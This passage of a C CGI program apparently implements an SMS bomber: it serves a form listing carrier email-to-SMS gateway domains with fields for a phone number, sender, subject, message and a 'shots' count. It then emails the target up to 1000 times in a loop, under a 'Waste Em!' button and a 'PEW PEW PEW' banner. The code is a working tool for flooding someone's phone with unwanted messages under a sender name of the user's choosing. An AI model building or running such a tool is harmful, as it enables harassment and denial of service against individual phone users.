    printf("                            <option value=\"@messaging.sprintpcs.com\">Sprint</option>\n");
    printf("                            <option value=\"@tms.suncom.com\">Sumcom</option>\n");
    printf("                            <option value=\"@mobile.surewest.com\">Surewest Communicaitons</option>\n");
    printf("                            <option value=\"@tmomail.net\">T-Mobile</option>\n");
    printf("                            <option value=\"@msg.telus.com\">Telus</option>\n");
    printf("                            <option value=\"@tms.suncom.com\">Triton</option>\n");
    printf("                            <option value=\"@utext.com\">Unicel</option>\n");
    printf("                            <option value=\"@email.uscc.net\">US Cellular</option>\n");
    printf("                            <option value=\"@uswestdatamail.com\">US West</option>\n");
    printf("                            <option value=\"@vtext.com\">Verizon</option>\n");
    printf("                            <option value=\"@vmobl.com\">Virgin Mobile</option>\n");
    printf("                            <option value=\"@vmobile.ca\">Virgin Mobile Canada</option>\n");
    printf("                            <option value=\"@sms.wcc.net\">West Central Wireless</option>\n");
    printf("                            <option value=\"@cellularonewest.com\">Western Wireless</option>\n");
    printf("                        </select>\n");
    printf("                    </div>\n");
    printf("                </li>\n");
    printf("                <li id=\"li_2\" >\n");
    printf("                    <label class=\"description\" for=\"sender\">Sender </label>\n");
    printf("                    <div>\n");
    printf("                        <input id=\"element_2\" name=\"sender\" class=\"element text medium\" type=\"text\" maxlength=\"255\" value=\"\"/>\n");
    printf("                    </div>\n");
    printf("                </li>\n");
    printf("                <li id=\"li_4\" >\n");
    printf("                    <label class=\"description\" for=\"subject\">Subject </label>\n");
    printf("                    <div>\n");
    printf("                        <input id=\"element_4\" name=\"subject\" class=\"element text large\" type=\"text\" maxlength=\"255\" value=\"\"/>\n");
    printf("                    </div>\n");
    printf("                </li>\n");
    printf("                <li id=\"li_3\" >\n");
    printf("                    <label class=\"description\" for=\"msg\">Message </label>\n");
    printf("                    <div>\n");
    printf("                        <textarea id=\"element_3\" name=\"msg\" class=\"element textarea small\"></textarea>\n");
    printf("                    </div>\n");
    printf("                </li>\n");
    printf("                <li class=\"buttons\">\n");
    printf("                    <input id=\"saveForm\" class=\"button_text\" type=\"submit\" name=\"submit\" value=\"Waste Em!\" />\n");
    printf("                </li>\n");
    printf("            </ul>\n");
    printf("        </form>\n");
    printf("        <div id=\"footer\">\n");
    printf("            Coded by TheMongler for <a href=\"http://pl0x.org/\">Clumsy</a>\n");
    printf("        </div>\n");
    printf("    </div>\n");
    printf("</body>\n");
    printf("</html>\n");
}

int main() {
    char *method = getenv("REQUEST_METHOD");
    if (method == NULL) {
        printf("Content-Type: text/plain\r\n\r\n");
        printf("Error: REQUEST_METHOD not set\n");
        return 1;
    }

    if (strcmp(method, "GET") == 0) {
        /* Serve the HTML form */
        print_html_form();
    } else if (strcmp(method, "POST") == 0) {
        /* Get POST data */
        char *content_length_str = getenv("CONTENT_LENGTH");
        if (content_length_str == NULL) {
            printf("Content-Type: text/plain\r\n\r\n");
            printf("Error: CONTENT_LENGTH not set\n");
            return 1;
        }

        int content_length = atoi(content_length_str);
        if (content_length <= 0 || content_length > 4096) {
            printf("Content-Type: text/plain\r\n\r\n");
            printf("Error: Invalid CONTENT_LENGTH\n");
            return 1;
        }

        char *post_data = malloc(content_length + 1);
        if (post_data == NULL) {
            printf("Content-Type: text/plain\r\n\r\n");
            printf("Error: Memory allocation failed\n");
            return 1;
        }

        fread(post_data, 1, content_length, stdin);
        post_data[content_length] = '\0';

        /* Parse POST data */
        char number[256] = "", provider[256] = "", shots[256] = "", sender[256] = "", subject[256] = "", msg[256] = "";
        parse_post_data(post_data, number, provider, shots, sender, subject, msg);

        /* Construct recipient email */
        char to[512];
        snprintf(to, sizeof(to), "%s%s", number, provider);

        /* Output response */
        printf("Content-Type: text/html\r\n\r\n");
        printf("<!DOCTYPE html>\n<html><body>\n");
        printf("<div>PEW PEW PEW - %s</div>\n", to);

        /* Send emails */
        int shots_num = atoi(shots);
        if (shots_num > 0 && shots_num <= 1000) { /* Limit to prevent abuse */
            curl_global_init(CURL_GLOBAL_ALL);
            for (int i = 0; i < shots_num; i++) {
                send_email(to, sender, subject, msg, provider);
            }
            curl_global_cleanup();
            printf("<p>%d messages sent.</p>\n", shots_num);
        } else {
            printf("<p>Error: Invalid number of shots.</p>\n");
        }

        printf("</body></html>\n");

        free(post_data);
    } else {
        printf("Content-Type: text/plain\r\n\r\n");
        printf("Error: Unsupported REQUEST_METHOD\n");
        return 1;
    }

    return 0;
}
